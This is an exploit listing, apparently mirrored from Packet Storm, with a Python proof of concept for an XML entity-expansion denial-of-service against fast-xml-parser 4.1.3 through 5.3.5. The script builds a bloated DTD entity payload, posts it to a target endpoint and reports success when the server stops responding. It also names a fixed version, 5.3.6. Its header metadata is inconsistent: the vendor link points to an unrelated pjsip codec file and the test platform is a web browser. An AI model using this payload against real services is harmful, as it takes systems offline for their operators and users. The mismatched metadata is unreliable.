Share
## https://sploitus.com/exploit?id=PACKETSTORM:216285
=============================================================================================================================================
    | # Title     : XML Entity Expansion Denialโ€‘ofโ€‘Service (DoS) via Malicious DTD Injection                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h                              |
    =============================================================================================================================================
    
    [+] Summary    : A Denial-of-Service (DoS) vulnerability was identified in fast-xml-parser affecting versions 4.1.3 through 5.3.5.
                     The issue arises from improper handling of XML Document Type Definitions (DTD), specifically when processing internal entity expansion. 
                     An attacker can supply a crafted XML payload containing recursively or massively referenced internal entities. 
    				 Even with a very small input size, the parser may be forced to perform excessive entity expansion.
    				 
    [+] Affected Versions
    
    4.1.3 through 5.3.5
    
    [+] Fixed Version
    
    5.3.6
    				 
    [+] POC   :  
    
    import requests
    import time
    
    TARGET_URL = "http://localhost:3000/parse-xml" # Replace with your target endpoint
    
    def generate_malicious_xml():
        """
        Generates a malicious XML payload that bypasses nested entity checks
        but contains a massive amount of raw text for expansion.
        """
        large_data = "A" * 50000 
        references = "&dos;" * 1000
        
        xml_payload = f"""<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE exploit [
      <!ENTITY dos "{large_data}">
    ]>
    <root>
        <trigger>{references}</trigger>
    </root>
    """
        return xml_payload
    
    def launch_exploit(url):
        """
        Sends the payload and measures the server's response time.
        """
        payload = generate_malicious_xml()
        
        print(f"[*] Malicious payload generated (Upload size: {len(payload) / 1024:.2f} KB)")
        print(f"[*] Sending exploit to: {url}...")
        
        start_time = time.time()
        
        try:
    
            response = requests.post(
                url, 
                data=payload, 
                headers={'Content-Type': 'application/xml'}, 
                timeout=10
            )
            print(f"[!] Server responded with status: {response.status_code}")
            print("[?] Exploit might have failed or the server is protected.")
            
        except requests.exceptions.Timeout:
            duration = time.time() - start_time
            print(f"[+] Exploit Successful! Server did not respond for {duration:.2f} seconds.")
            print("[!] The Parser is now busy processing, consuming 100% CPU.")
            
        except requests.exceptions.ConnectionError:
            print("[!] Connection failed: The server might have crashed or the service is down.")
        except Exception as e:
            print(f"[-] An unexpected error occurred: {e}")
    
    if __name__ == "__main__":
    
        launch_exploit(TARGET_URL)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================